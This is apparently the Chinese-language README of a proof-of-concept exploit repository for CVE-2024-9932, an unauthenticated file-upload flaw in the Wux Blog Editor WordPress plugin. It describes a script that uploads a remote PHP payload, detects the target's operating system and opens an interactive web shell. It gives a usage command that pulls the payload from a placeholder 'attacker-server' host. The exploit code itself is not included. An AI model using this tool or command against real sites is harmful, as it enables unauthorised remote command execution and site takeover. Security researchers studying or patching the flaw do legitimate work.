
未认证的 0-click RCE 漏洞利用,针对 CVE-2024-9932。利用 Wux Blog Editor WordPress 插件中的任意文件上传漏洞,上传远程 PHP 载荷,检测目标操作系统,并通过交互式 Web Shell 实现远程命令执行。

此仓库包含针对 CVE-2024-9932 的概念验证利用代码,该漏洞是 Wux Blog Editor WordPress 插件中的一个未经身份验证的任意文件上传漏洞,可导致远程命令执行(RCE)。
该脚本利用一个易受攻击的 REST 端点,无需身份验证即可上传远程 PHP 负载。上传后,它会重构最终文件位置、检测目标操作系统,并提供用于命令执行的交互式远程 shell。
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
执行后,脚本会上传负载、确认其可访问性、检测操作系统,并进入交互式 shell。